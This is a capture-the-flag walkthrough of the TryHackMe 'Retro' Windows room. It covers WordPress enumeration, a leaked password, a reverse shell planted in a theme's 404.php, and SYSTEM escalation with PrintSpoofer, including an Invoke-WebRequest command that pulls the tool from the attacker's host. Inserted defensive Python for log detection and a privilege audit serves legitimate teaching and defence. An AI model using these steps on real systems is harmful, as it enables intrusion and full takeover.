TryHackMe : Retro
Intro : This is my new writeup on the TryHackMe room Retro. It is a Windows-based room. Here you have to hijack a WordPress account and get RCE on the machine. At the end you have to escalate your privileges by abusing the enabled SeImpersonatePrivilege with PrintSpoofer.exe. So let’s hack it.
Nmap Scan :
As usual we start with a basic Nmap scan. I found 2 ports open:
80 (HTTP) and 3389 (RDP).
As we have no credentials to log in over an RDP session, I go back to the website.
Web Enumeration :
On port 80 a Microsoft IIS server is running.
So I start a GoBuster scan for directory brute-forcing. I found a valid directory called ‘retro’.
Tip : gobuster dir -u http://<ip>/ -w <path_of_wordlist> (SecLists)
After that I visit the website, and it is a WordPress page.
So I run WPScan to enumerate the website and look for valid users on that site.
Tip : wpscan --url http://<ip>/retro/ -e u
I found ‘wade’ is a valid user, but I have no password to log in. So I check the website and its source code again.
In the source code of the main page I found a URL ‘/retro/index.php/author/wade’ and visited that page. It is the comment section.
Below on that page I found a string: parzival. I thought it could be wade’s password.
Tip → wade : parzival
WordPress Exploitation :
I entered these creds on the WordPress login page and got access to the admin panel. Yupp!
Here, in the Theme Editor page (theme 90s Retro), I select 404.php and replace its content with a Windows PHP reverse shell.
You can find it here.
Don’t forget to change the IP and port in the reverse shell.
Then I saved it and started my Netcat listener. Then I visited the 404.php page.
And suddenly I get a reverse shell in my listener.
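The chain above (admin login, theme file saved through the editor, then a direct request to the edited theme file) leaves a distinctive trail in the IIS access log. The following is an added example, not code from the writeup or from TryHackMe, that parses IIS W3C log lines and flags that sequence per client IP. The log lines are constructed for the example; the ‘/retro’ prefix and the theme slug ‘90s-retro’ are assumptions. Saving a theme file is a POST to wp-admin/theme-editor.php on older WordPress versions and a POST to wp-admin/admin-ajax.php with action=edit-theme-plugin-file on 4.9 and later, so both are treated as a "theme file saved" event.

```python
"""Added example, not part of the original writeup: detect theme-editor abuse
(a theme file written through the editor, then fetched directly) in IIS W3C logs.
The log below is constructed; '/retro' and '90s-retro' are assumed names."""
import re

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-05-20 10:01:02 10.10.10.5 GET /retro/ - 80 - 10.9.1.7 Mozilla/5.0 200
2020-05-20 10:01:09 10.10.10.5 POST /retro/wp-login.php - 80 - 10.9.1.7 Mozilla/5.0 302
2020-05-20 10:02:31 10.10.10.5 GET /retro/wp-admin/theme-editor.php file=404.php&theme=90s-retro 80 - 10.9.1.7 Mozilla/5.0 200
2020-05-20 10:03:44 10.10.10.5 POST /retro/wp-admin/admin-ajax.php action=edit-theme-plugin-file 80 - 10.9.1.7 Mozilla/5.0 200
2020-05-20 10:03:50 10.10.10.5 GET /retro/wp-content/themes/90s-retro/404.php - 80 - 10.9.1.7 Mozilla/5.0 200
2020-05-20 10:05:00 10.10.10.5 GET /retro/index.php/author/wade - 80 - 10.9.2.3 Mozilla/5.0 200
"""

# A GET aimed straight at a PHP file inside a theme directory. WordPress
# normally includes templates itself, so direct requests for them are unusual.
THEME_FILE_RE = re.compile(r"/wp-content/themes/[^/]+/[^/]+\.php$")


def parse_iis_log(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()  # IIS encodes spaces inside a field as '+'
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def is_theme_file_save(row):
    """True when the request is a write through the WordPress theme editor."""
    if row["cs-method"] != "POST":
        return False
    stem, query = row["cs-uri-stem"], row["cs-uri-query"]
    if stem.endswith("/wp-admin/theme-editor.php"):
        return True  # form-based save used by older WordPress releases
    return stem.endswith("/wp-admin/admin-ajax.php") and "action=edit-theme-plugin-file" in query


def find_theme_editor_abuse(rows):
    """Return (client_ip, path) pairs where a client that saved a theme file
    later requests a theme PHP file directly. Rows must be in log order."""
    saved = set()
    hits = []
    for row in rows:
        ip = row["c-ip"]
        if is_theme_file_save(row):
            saved.add(ip)
        elif ip in saved and row["cs-method"] == "GET" and THEME_FILE_RE.search(row["cs-uri-stem"]):
            hits.append((ip, row["cs-uri-stem"]))
    return hits


if __name__ == "__main__":
    for ip, path in find_theme_editor_abuse(parse_iis_log(SAMPLE_LOG)):
        print(f"possible theme-editor web shell: {ip} saved a theme file, then fetched {path}")
```

The cheaper fix is not to have the editor at all: `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the theme and plugin editors from the admin panel, so a stolen admin password no longer turns into code execution on the server.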
Privilege Escalation :
It’s time for some PrivEsc. I check all the privileges of the current user on that machine, as we don’t have any access to the wade user.
Tip : whoami /priv
I found SeImpersonatePrivilege is enabled. I found this post on how to abuse this privilege to get administrative access on that machine.
I made a temp folder and moved into it.
Then I invoke PowerShell with the powershell command.
I downloaded the Git repo on my Kali machine.
Then on my machine I started a Python3 web server in the folder where the PrintSpoofer32.exe file is present, and used the following command to download the file onto the victim’s machine.
Tip : Invoke-WebRequest -Uri http://<tun0_ip>:<port>/PrintSpoofer.exe -OutFile PrintSpoofer.exe
You can use the exe’s help command for any help using it.
Then I run the following command, as mentioned in the post, to get access as the Administrator user.
Tip : .\PrintSpoofer.exe -i -c cmd
And it will prompt us with a SYSTEM shell.
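The whole escalation hinges on one line of `whoami /priv` output, so it is worth being able to audit that output for the account a service such as IIS runs under before an attacker does. The following is an added example, not code from the writeup or from the PrintSpoofer project, that parses `whoami /priv` output and reports the token-impersonation privileges (SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege) that tools like PrintSpoofer rely on. The sample output is constructed to resemble what the writeup describes; the privilege list on the real box may differ.

```python
"""Added example, not part of the original writeup: parse `whoami /priv` and
flag the impersonation privileges that make a service account a SYSTEM
escalation path. SAMPLE_WHOAMI_PRIV is constructed for this example."""
import re

# The two privileges token-impersonation tools such as PrintSpoofer rely on.
IMPERSONATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
}

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text):
    """Map privilege name -> True if Enabled, False if Disabled."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def impersonation_privileges(privs):
    """Return sorted (name, state, description) triples for held impersonation
    privileges. A Disabled privilege still counts: a process can enable any
    privilege its token already holds, so 'held' matters more than the state."""
    return sorted(
        (name, "Enabled" if enabled else "Disabled", IMPERSONATION_PRIVS[name])
        for name, enabled in privs.items()
        if name in IMPERSONATION_PRIVS
    )


if __name__ == "__main__":
    for name, state, why in impersonation_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{name} ({state}): {why}")
```

Service accounts that IIS and similar servers run under hold SeImpersonatePrivilege by design, so the finding itself is normal; what made it exploitable here is that a web shell landed on that account in the first place. The audit is therefore a prompt to review how reachable such an account is (in this room: a public password and an enabled theme editor), not a privilege to strip blindly.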
On the wade user’s Desktop you can find the user flag.
On the Administrator’s Desktop you can find the root flag.
Bingo!!!! We completed the room. Here we learned how to exploit a WordPress account and how to abuse SeImpersonatePrivilege to get admin access.
If you liked it, don’t forget to follow me for more articles.
THANKS FOR READING!
Happy Hacking~